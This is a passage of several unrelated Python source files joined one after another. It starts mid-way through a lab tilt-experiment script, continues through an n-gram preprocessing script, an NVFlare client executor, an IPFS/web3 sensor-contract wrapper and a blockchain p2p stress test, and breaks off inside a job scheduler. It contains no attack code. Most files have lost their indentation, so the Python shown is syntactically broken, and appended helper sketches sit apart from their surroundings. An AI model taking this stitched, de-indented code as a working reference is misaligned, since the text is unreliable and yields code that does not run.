taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,self.begin,None,None)
print('delay')
time.sleep(delay) ############################################# delay--- can keep this
## except KeyboardInterrupt:
## try:
## task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,begin,None,None)
## print('\nPausing... (Hit ENTER to continue, type quit to exit.)')
## response = input()
## if response == 'quit':
## exit()
## print('Resuming...')
## except:
## pass ##Need to check how the loop starts again after pausing like this. Might be ok?
def choose():
#No event 2 and 4 for early training
#because they are the fast tilts and animals take longer to get used to them
a = [1]*100
a.extend([2]*100)
a.extend([3]*100)
a.extend([4]*100)
np.random.shuffle(a)
return a
if __name__ == "__main__":
# Create instance of API class
channel_dict = {8: [2], 9: [1,2], 20: [2], 22: [2,3]} #New Format to compare Channel and Unit. 0 is unsorted. Channels are Dict Keys, Units are in each list.
pre_time = 0.200 #seconds (This value is negative or whatever you put, ex: put 0.200 for -200 ms)
post_time = 0.200 #seconds
bin_size = 0.05 #seconds
baseline_recording = True
psthclass = PSTH(channel_dict, pre_time, post_time, bin_size)
tilter = tiltclass()
if baseline_recording == False:
psthclass.loadtemplate()
##Setup for Plexon DO ########### Maybe will use this later?
# compatible_devices = ['PXI-6224', 'PXI-6259']
# plexdo = PyPlexDO()
# doinfo = plexdo.get_digital_output_info()
# device_number = None
# for i in range(doinfo.num_devices):
# if plexdo.get_device_string(doinfo.device_numbers[i]) in compatible_devices:
# device_number = doinfo.device_numbers[i]
# if device_number == None:
# print("No compatible devices found. Exiting.")
# sys.exit(1)
# else:
# print("{} found as device {}".format(plexdo.get_device_string(device_number), device_number))
# res = plexdo.init_device(device_number)
# if res != 0:
# print("Couldn't initialize device. Exiting.")
# sys.exit(1)
# plexdo.clear_all_bits(device_number)
##End Setup for Plexon DO
client = PyPlexClientTSAPI()
# Connect to OmniPlex Server
client.init_client()
begin = np.array([0,0,0,0,0,0,0,0], dtype=np.uint8)
task = Task()
taskinterrupt = Task()
data = begin
task.CreateDOChan("/Dev4/port0/line0:7","",PyDAQmx.DAQmx_Val_ChanForAllLines)
taskinterrupt.CreateDOChan("/Dev4/port1/line0:7","",PyDAQmx.DAQmx_Val_ChanForAllLines)
task.StartTask()
taskinterrupt.StartTask()
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
taskinterrupt.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,data,None,None)
## For Testing
## tiltstart = Process(target = tilttest, args = '')
## tiltstart.start()
## tiltstart.join()
## LoadCellThread()
## tiltstart.terminate()
# sensors = Process(target = LoadCellThread, args = '')
# sensors.start()
# tic,clk,starttic,start,starttime,running,stoprunning,startpulse,endtime,counter = initialize()
# loop = traverseSG()
# endgame = loop.run()
# print('Sensors started, waiting for Start pulse from Plexon,\n press Enter to begin Tilts after starting Plexon Recording.')
# while endgame < 2:
# endgame = loop.run()
input('Start Pulse Acquired, Press Enter to begin Tilts')
tilts = choose()
####################################################################################################################################################
#Tilt called here.
for i in range(0,400):
try:
tilter.tilt(i,task,taskinterrupt,tilts,psthclass,client,baseline_recording)
            # if endgame < 3:
            #     endgame = loop.run()
except KeyboardInterrupt:
task.WriteDigitalLines(1,1,10.0,PyDAQmx.DAQmx_Val_GroupByChannel,begin,None,None)
            print('\nPausing... (Hit ENTER to continue, type quit to exit.)')
try:
response = input()
if response == 'quit':
# endgame = 3
break
print('Resuming...')
except:
pass
continue
except TypeError:
continue
######################################################################################################################################################
# endgame = 3
# try:
# print('Stop Plexon Recording.')
# while endgame < 4:
# endgame = loop.waitforend()
# except KeyboardInterrupt:
# sensors.terminate()
# pass
task.StopTask()
taskinterrupt.StopTask()
    # sensors.terminate()
print('Done')
|
process.py
|
import subprocess as sp
from os import listdir, linesep
from os.path import isfile, join
from multiprocessing import Queue, Process
import argparse
import string
import collections
import cPickle as pickle
def process(queue, tmp_dir, years):
years_lookup = set(map(str, years))
while not queue.empty():
file = queue.get()
ngram_by_year = {}
onegram_by_year = {}
for year in years:
ngram_by_year[str(year)] = [] # strings of "ngram\t count"
onegram_by_year[str(year)] = collections.Counter() # token: count
print("processing {}".format(file))
out_of_year_count = 0
total_count = 0
with open(file, 'r') as f:
for line in f:
row = line.strip().split("\t")
if (len(row) < 5):
print(line)
continue
filtered = row[0].translate(None, string.punctuation)
filtered = filtered.decode('unicode_escape').encode('ascii','ignore')
ngram = filtered.strip().split(" ")
year = row[1]
total_count += 1
if year not in years_lookup:
out_of_year_count += 1
continue
match_count = row[2]
# update onegrams: this is an approx. but is close
for token in ngram:
onegram_by_year[year][token] += int(match_count)
ngram_by_year[year].append("\t".join([filtered, match_count]))
# print(ngram)
print("total {} ngrams with {} out of year range".format(total_count, out_of_year_count))
out_dir = "{}/{}".format(tmp_dir, file.split('/')[-1])
sp.check_output("mkdir -p {}".format(out_dir), shell=True)
for year in years:
with open(out_dir + "/" + str(year) + "-onegram.pkl", 'w') as f:
pickle.dump(onegram_by_year[str(year)], f)
with open(out_dir + "/" + str(year) + "-ngram.txt", 'w') as f:
f.write(linesep.join(ngram_by_year[str(year)]))
sp.check_output("rm {}".format(file), shell=True)
parser = argparse.ArgumentParser()
parser.add_argument("--num_workers", type=int, default=1)
parser.add_argument("--unzip_dir", type=str, default="data/unzipped_data")
parser.add_argument("--tmp_dir", type=str, default="data/tmp_processed_data")
parser.add_argument("--start", type=int, default=1800)
parser.add_argument("--end", type=int, default=2009)
args = parser.parse_args()
num_files = 800
unzipped_dir = args.unzip_dir
tmp_dir = args.tmp_dir
files = [join(unzipped_dir, f) for f in listdir(unzipped_dir) if isfile(join(unzipped_dir, f))]
assert(len(files) == num_files)
sp.check_output("mkdir -p {}".format(tmp_dir), shell=True)
queue = Queue()
for file in files:
queue.put(file)
workers = []
years = range(args.start, args.end + 1)
for i in range(args.num_workers):
workers.append(Process(target=process, args=(queue, tmp_dir, years)))
for worker in workers:
worker.start()
for worker in workers:
worker.join()
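# Hedged alternative sketch (not used above): multiprocessing.Queue.empty() is
# only advisory across processes, so a worker can see a non-empty queue and
# still block forever in get() if another worker grabs the last item first.
# A conventional fix is to rely on get() with a timeout and treat the timeout
# as "no work left". Names here are illustrative only.
def drain(work_queue, handle, timeout=5):
    import Queue  # stdlib module that defines the Empty exception (Python 2, as above)
    while True:
        try:
            item = work_queue.get(timeout=timeout)
        except Queue.Empty:
            break
        handle(item)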
|
client_executor.py
|
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import math
import os
import shlex
import subprocess
import sys
import threading
import time
from multiprocessing.connection import Client
from nvflare.apis.fl_constant import AdminCommandNames, ReturnCode
from nvflare.apis.shareable import Shareable, make_reply
from nvflare.fuel.utils.pipe.file_pipe import FilePipe
from .client_status import ClientStatus, get_status_message
class ClientExecutor(object):
def __init__(self, uid) -> None:
pipe_path = "/tmp/fl/" + uid + "/comm"
if not os.path.exists(pipe_path):
os.makedirs(pipe_path)
self.pipe = FilePipe(root_path=pipe_path, name="training")
self.logger = logging.getLogger(self.__class__.__name__)
def start_train(self, client, args, app_root, app_custom_folder, listen_port):
"""
start_train method to start the FL client training.
:param client: the FL client object.
:param args: admin command arguments for starting the FL client training.
:param app_root: the root folder of the running APP.
:return:
"""
pass
def start_mgpu_train(self, client, args, app_root, gpu_number, app_custom_folder, listen_port):
"""
start the FL client training using multi-GPU.
:param client: the FL client object.
:param args: admin command arguments for starting the FL client training.
:param app_root: the root folder of the running APP.
:param gpu_number: number of GPUs to run FL training
:return:
"""
pass
def check_status(self, client):
"""
check the status of the running client.
:param client: the FL client object.
:return: running FL client status message.
"""
pass
def abort_train(self, client):
"""
To abort the running client.
:param client: the FL client object.
:return: N/A
"""
pass
def abort_task(self, client):
"""
To abort the client executing task.
:param client: the FL client object.
:return: N/A
"""
pass
def get_run_info(self):
"""
To get the run_info from the InfoCollector.
Returns:
"""
pass
def get_errors(self):
"""
To get the error_info from the InfoCollector.
Returns:
"""
pass
def reset_errors(self):
"""
To reset the error_info for the InfoCollector.
Returns:
"""
pass
def send_aux_command(self, shareable: Shareable):
"""
To send the aux command to child process.
Returns:
"""
pass
def cleanup(self):
self.pipe.clear()
class ProcessExecutor(ClientExecutor):
"""
Run the Client executor in a child process.
"""
def __init__(self, uid):
ClientExecutor.__init__(self, uid)
# self.client = client
self.conn_client = None
# self.pool = None
self.listen_port = 6000
self.lock = threading.Lock()
def get_conn_client(self):
if not self.conn_client:
try:
address = ("localhost", self.listen_port)
self.conn_client = Client(address, authkey="client process secret password".encode())
except Exception as e:
pass
def create_pipe(self):
"""Create pipe to communicate between child (training) and main (logic) thread."""
pipe = FilePipe(root_path="/fl/server", name="training")
return pipe
def start_train(self, client, args, app_root, app_custom_folder, listen_port):
# self.pool = multiprocessing.Pool(processes=1)
# result = self.pool.apply_async(_start_client, (client, args, app_root))
# self.conn_client, child_conn = mp.Pipe()
# process = multiprocessing.Process(target=_start_client, args=(client, args, app_root, child_conn, self.pipe))
# # process = multiprocessing.Process(target=_start_new)
# process.start()
self.listen_port = listen_port
new_env = os.environ.copy()
if app_custom_folder != "":
new_env["PYTHONPATH"] = new_env["PYTHONPATH"] + ":" + app_custom_folder
# self.retrieve_cross_validate_setting(client, app_root)
command_options = ""
for t in args.set:
command_options += " " + t
command = (
f"{sys.executable} -m nvflare.private.fed.app.client.worker_process -m "
+ args.workspace
+ " -s fed_client.json "
" --set" + command_options + " print_conf=True"
)
# use os.setsid to create new process group ID
process = subprocess.Popen(shlex.split(command, " "), preexec_fn=os.setsid, env=new_env)
print("training child process ID: {}".format(process.pid))
client.process = process
client.multi_gpu = False
client.status = ClientStatus.STARTED
thread = threading.Thread(
target=self.wait_training_process_finish, args=(client, args, app_root, app_custom_folder)
)
thread.start()
# def retrieve_cross_validate_setting(self, client, app_root):
# if client.config_folder == "":
# client_config = "config_fed_client.json"
# else:
# client_config = client.config_folder + "/config_fed_client.json"
# client_config = os.path.join(app_root, client_config)
# conf = Configurator(
# app_root=app_root,
# cmd_vars={},
# env_config={},
# wf_config_file_name=client_config,
# base_pkgs=[],
# module_names=[],
# )
# conf.configure()
# client.cross_site_validate = conf.wf_config_data.get("cross_validate", False)
# def start_mgpu_train(self, client, args, app_root, gpu_number, app_custom_folder, listen_port):
# self.listen_port = listen_port
#
# new_env = os.environ.copy()
# new_env["PYTHONPATH"] = new_env["PYTHONPATH"] + ":" + app_custom_folder
#
# # self.retrieve_cross_validate_setting(client, app_root)
#
# if client.platform == "PT":
# command = (
# f"{sys.executable} -m torch.distributed.launch --nproc_per_node="
# + str(gpu_number)
# + " --nnodes=1 --node_rank=0 "
# + '--master_addr="localhost" --master_port=1234 '
# + "-m nvflare.private.fed.app.client.worker_process -m "
# + args.workspace
# + " -s fed_client.json "
# " --set secure_train="
# + str(client.secure_train)
# + " print_conf=True use_gpu=True multi_gpu=True uid="
# + client.client_name
# + " config_folder="
# + client.config_folder
# )
# # use os.setsid to create new process group ID
# process = subprocess.Popen(shlex.split(command, " "), preexec_fn=os.setsid, env=new_env)
# else:
# command = (
# "mpirun -np "
# + str(gpu_number)
# + " -H localhost:"
# + str(gpu_number)
# + " -bind-to none -map-by slot -x NCCL_DEBUG=DEBUG -x LD_LIBRARY_PATH -x PATH "
# "-mca pml ob1 -mca btl ^openib --allow-run-as-root "
# f"{sys.executable} -u -m nvmidl.apps.fed_learn.client.worker_process -m "
# + args.workspace
# + " -s fed_client.json --set secure_train="
# + str(client.secure_train)
# + " multi_gpu=true uid="
# + client.client_name
# + " config_folder="
# + client.config_folder
# )
# process = subprocess.Popen(shlex.split(command, " "), env=new_env)
# client.process = process
# client.multi_gpu = True
# # self.pool = multiprocessing.Pool(processes=1)
# # result = self.pool.apply_async(self.call_mpirun, (client, args, app_root))
#
# client.status = ClientStatus.STARTED
# thread = threading.Thread(
# target=self.wait_training_process_finish, args=(client, args, app_root, app_custom_folder)
# )
# thread.start()
def check_status(self, client):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.CHECK_STATUS, "data": {}}
self.conn_client.send(data)
status_message = self.conn_client.recv()
print("check status from process listener......")
return status_message
else:
return get_status_message(client.status)
except:
self.logger.error("Check_status execution exception.")
return "execution exception. Please try again."
def get_run_info(self):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.SHOW_STATS, "data": {}}
self.conn_client.send(data)
run_info = self.conn_client.recv()
return run_info
else:
return {}
except:
self.logger.error("get_run_info() execution exception.")
return {"error": "no info collector. Please try again."}
def get_errors(self):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.SHOW_ERRORS, "data": {}}
self.conn_client.send(data)
errors_info = self.conn_client.recv()
return errors_info
else:
return None
except:
self.logger.error("get_errors() execution exception.")
return None
def reset_errors(self):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.RESET_ERRORS, "data": {}}
self.conn_client.send(data)
except:
self.logger.error("reset_errors() execution exception.")
def send_aux_command(self, shareable: Shareable):
try:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.AUX_COMMAND, "data": shareable}
self.conn_client.send(data)
reply = self.conn_client.recv()
return reply
else:
return make_reply(ReturnCode.EXECUTION_EXCEPTION)
except:
return make_reply(ReturnCode.EXECUTION_EXCEPTION)
def abort_train(self, client):
# if client.status == ClientStatus.CROSS_SITE_VALIDATION:
# # Only aborts cross site validation.
# client.abort()
# elif client.status == ClientStatus.TRAINING_STARTED:
if client.status == ClientStatus.STARTED:
with self.lock:
if client.process:
# if client.platform == 'PT' and client.multi_gpu:
# # kill the sub-process group directly
# os.killpg(os.getpgid(client.process.pid), 9)
# else:
# client.process.terminate()
# kill the sub-process group directly
if self.conn_client:
data = {"command": AdminCommandNames.ABORT, "data": {}}
self.conn_client.send(data)
self.logger.debug("abort sent")
# wait for client to handle abort
time.sleep(2.0)
# kill the sub-process group directly
try:
os.killpg(os.getpgid(client.process.pid), 9)
self.logger.debug("kill signal sent")
except Exception as e:
pass
client.process.terminate()
self.logger.debug("terminated")
# if self.pool:
# self.pool.terminate()
if self.conn_client:
self.conn_client.close()
self.conn_client = None
self.cleanup()
self.logger.info("Client training was terminated.")
def abort_task(self, client):
if client.status == ClientStatus.STARTED:
if self.conn_client:
data = {"command": AdminCommandNames.ABORT_TASK, "data": {}}
self.conn_client.send(data)
self.logger.debug("abort_task sent")
def wait_training_process_finish(self, client, args, app_root, app_custom_folder):
# wait for the listen_command thread to start, and send "start" message to wake up the connection.
start = time.time()
while True:
self.get_conn_client()
if self.conn_client:
data = {"command": AdminCommandNames.START_APP, "data": {}}
self.conn_client.send(data)
break
time.sleep(1.0)
if time.time() - start > 15:
break
self.logger.info("waiting for process to finish")
client.process.wait()
returncode = client.process.returncode
self.logger.info(f"process finished with execution code: {returncode}")
with self.lock:
client.process = None
if self.conn_client:
self.conn_client.close()
self.conn_client = None
# # result.get()
# self.pool.close()
# self.pool.join()
# self.pool.terminate()
# Not to run cross_validation in a new process any more.
client.cross_site_validate = False
client.status = ClientStatus.STOPPED
def close(self):
if self.conn_client:
data = {"command": AdminCommandNames.SHUTDOWN, "data": {}}
self.conn_client.send(data)
self.conn_client = None
self.cleanup()
# class ThreadExecutor(ClientExecutor):
# def __init__(self, client, executor):
# self.client = client
# self.executor = executor
# def start_train(self, client, args, app_root, app_custom_folder, listen_port):
# future = self.executor.submit(lambda p: _start_client(*p), [client, args, app_root])
# def start_mgpu_train(self, client, args, app_root, gpu_number, app_custom_folder, listen_port):
# self.start_train(client, args, app_root)
# def check_status(self, client):
# return get_status_message(self.client.status)
# def abort_train(self, client):
# self.client.train_end = True
# self.client.fitter.train_ctx.ask_to_stop_immediately()
# self.client.fitter.train_ctx.set_prop("early_end", True)
# # self.client.model_manager.close()
# # self.client.status = ClientStatus.TRAINING_STOPPED
# return "Aborting the client..."
def update_client_properties(client, trainer):
# servers = [{t['name']: t['service']} for t in trainer.server_config]
retry_timeout = 30
# if trainer.client_config['retry_timeout']:
# retry_timeout = trainer.client_config['retry_timeout']
client.client_args = trainer.client_config
# client.servers = sorted(servers)[0]
# client.model_manager.federated_meta = {task_name: list() for task_name in tuple(client.servers)}
exclude_vars = trainer.client_config.get("exclude_vars", "dummy")
# client.model_manager.exclude_vars = re.compile(exclude_vars) if exclude_vars else None
# client.model_manager.privacy_policy = trainer.privacy
# client.model_manager.model_reader_writer = trainer.model_reader_writer
# client.model_manager.model_validator = trainer.model_validator
# client.pool = ThreadPool(len(client.servers))
# client.communicator.ssl_args = trainer.client_config
# client.communicator.secure_train = trainer.secure_train
# client.communicator.model_manager = client.model_manager
client.communicator.should_stop = False
client.communicator.retry = int(math.ceil(float(retry_timeout) / 5))
# client.communicator.outbound_filters = trainer.outbound_filters
# client.communicator.inbound_filters = trainer.inbound_filters
client.handlers = trainer.handlers
# client.inbound_filters = trainer.inbound_filters
client.executors = trainer.executors
# client.task_inbound_filters = trainer.task_inbound_filters
# client.task_outbound_filters = trainer.task_outbound_filters
# client.secure_train = trainer.secure_train
client.heartbeat_done = False
# client.fl_ctx = FLContext()
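# Hedged sketch (not part of this module) of the command listener the training
# child process is assumed to run on the other end of the
# multiprocessing.connection used by ProcessExecutor above. The real
# worker_process implementation is not shown here; the handling below is
# illustrative only.
def _example_command_listener(listen_port=6000):
    from multiprocessing.connection import Listener

    listener = Listener(("localhost", listen_port), authkey="client process secret password".encode())
    conn = listener.accept()
    try:
        while True:
            request = conn.recv()
            command = request.get("command")
            if command == AdminCommandNames.SHUTDOWN:
                break
            if command == AdminCommandNames.CHECK_STATUS:
                conn.send("status: training started")
    finally:
        conn.close()
        listener.close()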
|
__init__.py
|
from os.path import dirname
from ipfsApi import Client as IPFSClient
from base58 import b58decode, b58encode
from easysolc import Solc
import logging
def signWithPassword(keyFilePath, password):
import web3
account = web3.eth.Account()
with open(keyFilePath) as keyfile:
encrypted_key = keyfile.read()
private_key = account.decrypt(encrypted_key, password)
acc = account.privateKeyToAccount(private_key)
def f(trx):
return acc.signTransaction(transaction_dict = trx)
return f
def decodeMultihash(hashStr):
decoded = b58decode(hashStr)
return MultiHash(decoded[0],decoded[1], decoded[2:])
def encodeMultihash(multiHash):
return b58encode(bytes([multiHash.function, multiHash.length]) + multiHash.hashData)
class MultiHash:
def __init__(self, function, length, hashData):
self.function = function
self.length = length
self.hashData = hashData
def __str__(self):
return str(encodeMultihash(self))
def deploy(web3, owner, signCallback):
trx = SensorSource._sensorSourceContract.constructor().buildTransaction({
'nonce' : web3.eth.getTransactionCount(owner),
'from' : owner
})
signedTrx = signCallback(trx)
deployed = web3.eth.waitForTransactionReceipt(
web3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return deployed
class SensorSource:
_contractFile = dirname(__file__) + "/contracts/sensorSource.sol"
_sensorSourceContract = Solc().get_contract_instance(
source = _contractFile,
contract_name = "SensorSource"
)
def __init__(self, web3, ipfs, contractAddress):
self._log = logging.getLogger("SensorSource")
self.__w3 = web3
self.__ipfs = ipfs
self._contract_address = contractAddress
self.__contract = web3.eth.contract(
address = self._contract_address,
abi = self._sensorSourceContract.abi
)
self._log.info("Sensor source @ " + self._contract_address)
self.ipfs_add_str = self.decodeAsMultiHash(self.__ipfs.add_str)
def _trxDict(self, sender):
return {
'nonce' : self.__w3.eth.getTransactionCount(sender),
'from' : sender
}
def decodeAsMultiHash(self, f):
def f_(*args, **kwargs):
return decodeMultihash(f(*args, **kwargs))
return f_
def register(self, sensorId, sensorMetaData, owner, signCallback):
self._log.info("Register sensor " + sensorId)
metaDataHash = self.ipfs_add_str(sensorMetaData)
try:
trx = self.__contract.functions.register_native(
sensorId,
metaDataHash.function,
metaDataHash.length,
metaDataHash.hashData
).buildTransaction(self._trxDict(owner))
signedTrx = signCallback(trx)
result = self.__w3.eth.waitForTransactionReceipt(
self.__w3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return dict(success=True, metaData = metaDataHash, result = result)
except ValueError as e:
return dict(success=False, error = e)
def subscribe(self, sensorId, requestList, subscriber, signCallback):
self._log.info("Subscribe to sensor " + sensorId)
count = len(requestList)
reqListHash = self.ipfs_add_str("\n".join(requestList))
try:
trx = self.__contract.functions.subscribe_native(
sensorId,
reqListHash.function,
reqListHash.length,
reqListHash.hashData,
count
).buildTransaction(self._trxDict(subscriber))
signedTrx = signCallback(trx)
result = self.__w3.eth.waitForTransactionReceipt(
self.__w3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return dict(success=True, result = result)
except ValueError as e:
return dict(success=False, error = e)
def publish(self, sensorId, publicationNumber, publication, signCallback):
self._log.info("Publish as " + sensorId)
publicationHash = self.ipfs_add_str(publication)
try:
trx = self.__contract.functions.publish_native(
sensorId,
publicationHash.function,
publicationHash.length,
publicationHash.hashData,
publicationNumber
).buildTransaction(self._trxDict(sensorId))
signedTrx = signCallback(trx)
result = self.__w3.eth.waitForTransactionReceipt(
self.__w3.eth.sendRawTransaction(signedTrx.rawTransaction)
)
return dict(success=True, result = result)
except ValueError as e:
return dict(success=False, error = e)
class SensorSourceEvents:
def __init__(self, w3, contractAddress):
self._log = logging.getLogger("SensorSourceEvents")
self._contract_address = contractAddress
self._contract = w3.eth.contract(address = self._contract_address, abi = SensorSource._sensorSourceContract.abi)
self._log.info("Sensor source @ " + self._contract_address)
self._filters = {
'Registered' : self._contract.events.Registered.createFilter,
'Subscribed': self._contract.events.Subscribed.createFilter,
'Published' : self._contract.events.Published.createFilter
}
def history(self):
return dict(
[
(name, [
(e.args.sensorId, dict(e.args)) for e in f(fromBlock = 0, toBlock = 'latest').get_all_entries()
]) for (name, f) in self._filters.items()
]
)
def listen(self, handlers = {}, timeout = 1):
from multiprocessing import Process
import time
def poll():
filters = dict([(name, f(fromBlock='latest')) for (name, f) in self._filters.items()])
while True:
self._log.debug("Poll events")
for (name, filter) in filters.items():
handler = handlers.get(name)
if(handler):
self._log.debug('Events for ' + name)
for event in filter.get_new_entries():
try:
handler(**dict(event.args))
except Exception as e:
self._log.error('Handler {} failed with args {}:\n{}'.format(handler, str(event.args), e))
time.sleep(timeout)
self._poller = Process(target = poll)
self._poller.start()
class Subscription:
def __init__(self, sensorSource):
pass
class Publisher:
def __init__(self, sensorId):
self.__id = sensorId
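# Hedged end-to-end sketch (defined but never called by this package): wire up
# a web3 provider, an IPFS API client and a freshly deployed contract, then
# register a sensor. The endpoints, key file path, password and sensor id are
# placeholders, and the receipt field access assumes a dict-like web3 receipt.
def _example_usage():
    from web3 import Web3
    w3 = Web3(Web3.HTTPProvider("http://localhost:8545"))   # assumed local Ethereum node
    ipfs = IPFSClient("127.0.0.1", 5001)                     # assumed local IPFS API port
    owner = w3.eth.accounts[0]
    sign = signWithPassword("/path/to/keyfile.json", "password")
    receipt = deploy(w3, owner, sign)
    source = SensorSource(w3, ipfs, receipt["contractAddress"])
    return source.register("sensor-1", '{"type": "temperature"}', owner, sign)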
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, VACio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, VACio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, VACio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="VACio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission VACio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
scheduler.py
|
"""Contains RAPO scheduler interface."""
import argparse
import datetime as dt
import getpass
import json
import os
import platform
import re
import signal
import subprocess as sp
import sys
import threading as th
import time
import queue
import psutil
from ..database import db
from ..logger import logger
from ..reader import reader
from ..main.control import Control
class Scheduler():
"""Represents application scheduler.
The application scheduler reads its configuration from RAPO_CONFIG,
schedules controls as virtual jobs and runs them in separate threads
when due. The number of execution threads is limited to 5.
All scheduling and execution events, including errors, are logged into
plain text files placed in the logs folder next to the main script that
holds the Scheduler instance.
Scheduler timings (current timestamp, delay and wait time) are visible in
DEBUG mode.
The schedule is refreshed every 5 minutes, counted from the start of the hour.
Attributes
----------
moment : float or None
Current scheduler moment - internal timestamp.
delay : float or None
Current scheduler delay - time needed to execute internal tasks,
including job scheduling and maintenance events.
schedule : dict or None
Dictionary with scheduled jobs where the key is a control name and the
value is that control's configuration as another dictionary.
queue : queue.Queue
Queue of jobs to be executed in FIFO order.
executors : list
List of threads that perform job execution.
server : str or None
Hostname on which this scheduler is running.
username : str or None
OS user that started the scheduler.
pid : int or None
OS PID under which this scheduler is running.
start_date : datetime or None
Date when scheduler was started.
end_date : datetime or None
Date when scheduler was stopped.
status : str or None
Current scheduler status.
"""
def __init__(self):
self.schedule = None
self.moment = None
self.delay = None
self.queue = queue.Queue()
self.executors = []
self.maintenance = th.Event()
self.maintainer = None
self.table = db.tables.scheduler
self.record = reader.read_scheduler_record()
if self.record and self.record['status'] == 'Y':
self.server = self.record['server']
self.username = self.record['username']
self.pid = int(self.record['pid'])
self.start_date = self.record['start_date']
self.stop_date = self.record['stop_date']
self.status = True if self.record['status'] == 'Y' else False
else:
self.server = platform.node()
self.username = getpass.getuser()
self.pid = os.getpid()
self.start_date = None
self.stop_date = None
self.status = False
argv = self._parse_console_arguments()
if argv:
action = argv[0]
if action == 'start':
self.start()
elif action == 'stop':
self.stop()
else:
args = self._parse_arguments()
if args.start is True:
self._start()
elif args.stop is True:
self._stop()
pass
@property
def running(self):
"""Check whether scheduler is running."""
if self.status is True and self.pid and psutil.pid_exists(self.pid):
return True
else:
return False
pass
def start(self):
"""Start scheduler.
Once the scheduler is started, logs begin to be written (to console
and/or file depending on the setup).
RAPO_SCHEDULER will be updated with information about the current
scheduler process, including server, username, PID, start date and status.
"""
return self._create()
def stop(self):
"""Stop running scheduler.
Process will be stopped.
RAPO_SCHEDULER will be updated with stop date and status.
"""
return self._destroy()
def read(self):
"""Parse schedule from database table into appropriate structure."""
return dict(self._sked())
def _start(self):
if self.running:
message = f'scheduler already running at PID {self.pid}'
raise Exception(message)
logger.info('Starting scheduler...')
self.start_date = dt.datetime.now()
self.status = True
self._start_signal_handlers()
self._start_executors()
self._start_maintainer()
self._enable()
logger.info(f'Scheduler started at PID {self.pid}')
return self._run()
def _run(self):
self._synchronize()
while True:
self._process()
pass
def _stop(self):
if self.status is True:
logger.info('Stopping scheduler...')
self.stop_date = dt.datetime.now()
self.status = False
self._disable()
logger.info(f'Scheduler at PID {self.pid} stopped')
return self._exit()
pass
def _create(self):
exe = sys.executable
file = os.path.abspath(sys.argv[0])
args = '--start'
settings = {}
settings['stdout'] = sp.DEVNULL
settings['stderr'] = sp.DEVNULL
if sys.platform.startswith('win') is True:
settings['creationflags'] = sp.CREATE_NO_WINDOW
command = [exe, file, args]
proc = sp.Popen(command, **settings)
return proc
def _destroy(self):
if self.status is True:
self.stop_date = dt.datetime.now()
self.status = False
self._disable()
return self._terminate()
pass
def _enable(self):
conn = db.connect()
update = self.table.update().values(server=self.server,
username=self.username,
pid=self.pid,
